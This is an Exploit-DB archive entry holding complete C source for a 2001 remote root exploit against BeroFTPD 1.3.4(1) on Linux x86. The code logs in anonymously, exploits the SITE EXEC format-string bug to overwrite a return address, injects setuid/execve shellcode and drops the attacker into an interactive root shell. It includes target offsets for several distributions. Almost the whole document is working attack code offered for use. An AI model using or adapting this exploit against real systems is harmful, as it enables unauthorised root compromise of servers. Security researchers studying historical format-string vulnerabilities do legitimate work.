BeroFTPD 1.3.4(1) (Linux x86) - Remote Code Execution

EDB-ID:

269


Author:

qitest1

Type:

remote


Platform:

Linux_x86

Date:

2001-05-08


/*  
 *  BeroFTPD 1.3.4(1) Linux x86 remote root exploit 
 *  by qitest1 - 5/05/2001
 *
 *  BeroFTPD is an ftpd derived from wuftpd sources. This code
 *  exploits the format bug of the site exec cmd, well known to be
 *  present in wuftpd-2.6.0 and derived daemons. BeroFTPD 1.3.4(1) 
 *  is the current version at the moment.    
 *  
 *  JUST SAMPLE CODE. For different platforms you have to try with
 *  different offsets for different retaddrs. You see.. =)   
 *
 *  Greets: Nail, Norby, Berserker.
 *  69 rulez.. ;P
 */

#include <stdio.h> 
#include <stdlib.h> 
#include <getopt.h>
#include <errno.h> 
#include <netdb.h>
#include <unistd.h>
#include <string.h>
#include <netinet/in.h>

struct targ
{
   int			def;
   char 		*descr;
   unsigned long int 	enbuf;
   int			dawlen;
};

struct targ target[]=
    {			
      {0, "RedHat 6.2 with BeroFTPD 1.3.4(1) from tar.gz", 0xded, 6},
      {1, "Slackware 7.0 with BeroFTPD 1.3.4(1) from tar.gz", 0x1170, 12}, 
      {2, "Mandrake 7.1 with BeroFTPD 1.3.4(1) from rpm", 0xdf1, 6}, 
      {69, NULL, 0, 0}
    };

  /* 15 byte x86/linux PIC read() shellcode by lorian / teso
   */
unsigned char shellcode_read[] =
        "\x33\xdb"              /* xorl %ebx, %ebx      */
        "\xf7\xe3"              /* mull %ebx            */
        "\xb0\x03"              /* movb $3, %al         */
        "\x8b\xcc"              /* movl %esp, %ecx      */
        "\x68\xb2\x00\xcd\x80"  /* push 0x80CDxxB2      */
        "\xff\xff\xe4";         /* jmp  %esp            */

unsigned char shellcode[] =	/* Lam3rZ code */
        "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0"
        "\x31\xdb\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b"
        "\x5e\x31\xc0\x31\xc9\x8d\x5e\x01\x88\x46\x04\x66"
        "\xb9\xff\x01\xb0\x27\xcd\x80\x31\xc0\x8d\x5e\x01"
        "\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d\x5e\x08\x89"
        "\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0"
        "\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46\x09"
        "\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe"
        "\xc8\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08"
        "\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0"
        "\x0b\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80\xe8"
        "\x90\xff\xff\xff\x30\x62\x69\x6e\x30\x73\x68\x31"
        "\x2e\x2e\x31\x31";

char 		  	fmtstr[1024];
int			sock;
int			sel;
int			offset;
unsigned long int       retloc;
unsigned long int 	bufaddr;
unsigned long int	tmpaddr;
	
void 		fmtstr_build(unsigned long int bufaddr, unsigned long int retloc);
void 		xpad_cat (unsigned char *fabuf, unsigned long int addr);
void 		retloc_find(void);
void 		shellami(int sock);
void		login(void);
void		usage(char *progname);
int 		conn2host(char *host, int port);

main(int argc, char *argv[])
{
char		rbuf[1024];
char		*host = NULL;
int 		cnt;

  printf("\n  BeroFTPD 1.3.4(1) exploit by qitest1\n\n");
  if(argc == 1)
	usage(argv[0]);
  while((cnt = getopt(argc,argv,"h:t:o:")) != EOF)
    {
   switch(cnt)
        {
   case 'h':
      host = strdup(optarg);
      break;
   case 't':
     sel = atoi(optarg);       
     break;
   case 'o':
     offset = atoi(optarg);
     break;
   default:
     usage(argv[0]);
     break;
        }
    }

  if(host == NULL)
	usage(argv[0]);

  printf("+Host: %s\n  as: %s\n", host, target[sel].descr);

  printf("+Connecting to %s...\n", host);
  sock = conn2host(host, 21);
  printf("  connected\n");

  printf("+Receiving banner...\n");
  recv(sock, rbuf, 1024, 0);
  printf("%s", rbuf);
  memset(rbuf, 0, 1024);
  printf("  received\n");

  printf("+Logging in...\n");
  login();
  printf("  logged in\n");

  printf("+Searching retloc...\n");
  retloc_find();
  printf("  found: %p\n", retloc);

  printf("+Searching bufaddr...\n");
  bufaddr = tmpaddr + target[sel].enbuf;
  printf("  found: %p + offset = ", bufaddr);
  bufaddr += offset;
  printf("%p\n", bufaddr);  

  printf("+Preparing shellcode...\n");
  shellcode_read[strlen(shellcode_read)] = (unsigned char) strlen(shellcode);
  printf("  shellcode ready\n");

  printf("+Building fmtstr...\n");
  fmtstr_build(bufaddr, retloc);
  printf("  fmtstr builded\n");  
  
  printf("+Sending fmtstr...\n");
  send(sock, fmtstr, strlen(fmtstr), 0);
  printf("  fmtstr sent\n");
  recv(sock, rbuf, 1024, 0);
  sleep(1);
  send(sock, shellcode, strlen(shellcode), 0);
  sleep(2);
  printf("+Entering love mode...\n");  /* Nail teachs.. ;-) */
  shellami(sock);  

}

void
fmtstr_build(unsigned long int bufaddr, unsigned long int retloc)
{
int               i;
int		  eat = 136;
int               wlen = 428;
int               tow;
int               freespz;
char		  f[1024];
unsigned long int soul69 = 0x69696969;  /* That's amore.. =) */
unsigned char     retaddr[4];

  for(i = 0; i < 4; ++i)
	retaddr[i] = (bufaddr >> (i << 3)) & 0xff;

  wlen -= target[sel].dawlen;
  f[0] = 0;
  for(i = 0; i < eat; i++)
        strcat(f, "%.f");

  strcat(fmtstr, "SITE EXEC ");
  strcat(fmtstr, "  ");
  xpad_cat(fmtstr, retloc);
  xpad_cat(fmtstr, soul69);
  xpad_cat(fmtstr, retloc + 1);
  xpad_cat(fmtstr, soul69);
  xpad_cat(fmtstr, retloc + 2);
  xpad_cat(fmtstr, soul69);
  xpad_cat(fmtstr, retloc + 3);
  strcat(fmtstr, f);
  strcat(fmtstr, "%x");

  /* Code by teso
   */
  tow = ((retaddr[0] + 0x100) - (wlen % 0x100)) % 0x100;
  if (tow < 10) tow += 0x100;     
  sprintf (fmtstr + strlen (fmtstr), "%%%dd%%n", tow);
  wlen += tow;

  tow = ((retaddr[1] + 0x100) - (wlen % 0x100)) % 0x100;
  if (tow < 10) tow += 0x100;
  sprintf (fmtstr + strlen (fmtstr), "%%%dd%%n", tow);
  wlen += tow;

  tow = ((retaddr[2] + 0x100) - (wlen % 0x100)) % 0x100;
  if (tow < 10) tow += 0x100;
  sprintf (fmtstr + strlen (fmtstr), "%%%dd%%n", tow);
  wlen += tow;

  tow = ((retaddr[3] + 0x100) - (wlen % 0x100)) % 0x100;
  if (tow < 10) tow += 0x100;
  sprintf (fmtstr + strlen (fmtstr), "%%%dd%%n", tow);
  wlen += tow;
  /* End here
   */

  freespz = 510 - strlen(fmtstr) - strlen(shellcode_read) - 1;
  for(i = 0; i < freespz ; i++)
	strcat(fmtstr, "\x90");
  strcat(fmtstr, shellcode_read);

  strcat(fmtstr, "\n");

}

  /* Code by teso
   */
void xpad_cat (unsigned char *fabuf, unsigned long int addr)
{
        int             i;
        unsigned char   c;

        for (i = 0 ; i <= 3 ; ++i) {
                switch (i) {
                case (0):
                        c = (unsigned char) ((addr & 0x000000ff)      );
                        break;
                case (1):
                        c = (unsigned char) ((addr & 0x0000ff00) >>  8);
                        break;
                case (2):
                        c = (unsigned char) ((addr & 0x00ff0000) >> 16);
                        break;
                case (3):
                        c = (unsigned char) ((addr & 0xff000000) >> 24);
                        break;
                }
                if (c == 0xff)
                        sprintf (fabuf + strlen (fabuf), "%c", c);

                sprintf (fabuf + strlen (fabuf), "%c", c);
        }

        return;
}
  /* End here
   */

void
retloc_find(void)
{
int		i;
char		rbuf[1024];
char		sbuf[1024];
char		*ptr;

  strcpy(sbuf, "SITE EXEC ");
  for(i = 0; i < 6; i++)
	strcat(sbuf, "%p ");
  strcat(sbuf, "\n");
  send(sock, sbuf, strlen(sbuf), 0); 

  recv(sock, rbuf, 1024, 0);
  ptr = rbuf;
  for(i = 0; i < 5; i++)
	{
	  while(*ptr != ' ')
	  	ptr++;
	  ptr++;
	}
  ptr[strlen(ptr) - 2] = '\x00';	
  ptr[strlen(ptr) - 1] = '\x00';
  sscanf(ptr, "%p", &retloc);
  sscanf(ptr, "%p", &tmpaddr);
  retloc -= 0x40;

}

void
shellami(int sock)
{
int 		n;
char 		recvbuf[1024];
char		*cmd = "id; uname -a\n";
fd_set 		rset;

  send(sock, cmd, strlen(cmd), 0);

  while (1)
    {
      FD_ZERO(&rset);
      FD_SET(sock,&rset);
      FD_SET(STDIN_FILENO,&rset);
      select(sock+1,&rset,NULL,NULL,NULL);
      if (FD_ISSET(sock,&rset))
        {
          n=read(sock,recvbuf,1024);
          if (n <= 0)
            {
              printf("Connection closed by foreign host.\n");
              exit(0);
            }
          recvbuf[n]=0;
          printf("%s",recvbuf);
        }
      if (FD_ISSET(STDIN_FILENO,&rset))
        {
          n=read(STDIN_FILENO,recvbuf,1024);
          if (n>0)
            {
              recvbuf[n]=0;
              write(sock,recvbuf,n);
            }
        }
    }
  return;
}

int
conn2host(char *host, int port)
{
int 		sockfd;  
struct 		hostent *he;
struct 		sockaddr_in their_addr; 

  if ((he=gethostbyname(host)) == NULL)
	{ 
          herror("gethostbyname");
          exit(1);
	}
  if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
	{
          perror("socket");
          exit(1);
	}

  their_addr.sin_family = AF_INET;     
  their_addr.sin_port = htons(port);   
  their_addr.sin_addr = *((struct in_addr *)he->h_addr);
  bzero(&(their_addr.sin_zero), 8);     

  if(connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
	{
          perror("connect");
          exit(1);
	}
 
  return(sockfd);

}

void
login(void)
{
char		*user = "USER anonymous\n";
char		*pass = "PASS guest@\n";
char		rbuf[1024];

  send(sock, user, strlen(user), 0);
  recv(sock, rbuf, 1024, 0);
  memset(rbuf, 0, 1024);
  send(sock, pass, strlen(pass), 0);
  while(strstr(rbuf, "login ok") == NULL)
	{
	  memset(rbuf, 0, 1024);
	  recv(sock, rbuf, 1024, 0);
	}

}

void
usage(char *progname)
{
int		i = 0;
  
  printf("Usage: %s [options]\n", progname);
  printf("Options:\n"
	 "  -h hostname\n"
	 "  -t target\n"
	 "  -o offset\n"
	 "Available targets:\n");
  while(target[i].def != 69)
	{ 
          printf("  %d) %s\n", target[i].def, target[i].descr);
          i++;
	} 

  exit(1);

}


// milw0rm.com [2001-05-08]